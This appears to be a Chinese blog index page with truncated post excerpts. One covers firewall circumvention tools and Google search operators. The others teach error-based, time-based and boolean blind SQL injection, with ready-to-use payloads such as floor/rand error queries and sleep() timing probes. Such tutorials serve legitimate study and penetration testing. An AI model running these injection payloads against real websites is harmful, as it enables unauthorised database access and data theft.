Google hacking

一、翻墙

1、修改host问题,百度laod,即可找到相关内容,进行下载
2、代理,推荐影梭(shadowshacks),百度ishadow有免费的代理,买国外vps开代理。linux使用影梭参考文章linux安装shadowshacks。
3、vpn网上有免费的,也有付费版的。
4、软件如:lantern (蓝灯)、xx-net
蓝灯下载地址:https://github.com/getlantern/lantern-binaries

二、google基本语法

逻辑符: 与(空格) 或 (|) 非 (-)
google 不区分大小写 ,搜索包含整个词组或句子的网页信息,加[......]

继续阅读

报错注入

通过输入特殊符号,让浏览器报错,然后通过报错语句执行我们的sql语句,记得在最后加上注释如 --+,# 或者 or '1

一、通过输入特殊符号,让浏览器报错。

二、执行报错语句,查库、查表、查字段。

通过修改报错语句里面的sql语句达到我们查库、查表、查字段的目的。

三、十大报错语句。

1、通过floor报错
and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a) --+

2、ExtractVal[......]

继续阅读

基于时间延迟的注入

网页在输入正确或错误的sql语句只显示一个页面,我们可以构造一个时间函数,通过判断来判断sql语句,通过时间执行的长短测试sql语句是否执行正确。

一、找到数据库语句的闭合符号

?id=2' and if(1,sleep(10),1) --+ 语句闭合正确网站就会睡眠10s,我们会看到浏览器的小圈圈一直转10s。

二、用盲注的方法继续判断其他字段

通过修改database(语句继续用盲注的方法判断其他字段,参考基于布尔型的注入)

?id=2' and if((select length(database()))>8 ,sleep(5),1) --+  判断当前数据库的名字是[......]

继续阅读

基于布尔型的注入(盲注)

网页没有回显,只会在sql语句执行错误时,全部显示一个错误页面,通过错误回显,测试sql语句是否正确。

一、找到数据库语句的闭合符号

通过变换' " ') ") - 等找出闭合的符号。
?id=2' and 0  --+ 返回错误
?id=2' and 1  --+ 返回正确

二、通过显示不同,判断语句是否执行正确。猜测库名,表名,字段名。

?id=2' and (select length(database()))>10   猜测要查询语句的长
?id=2' and (select ascii(substring(database(),1,1)))>96  猜测要查[......]

继续阅读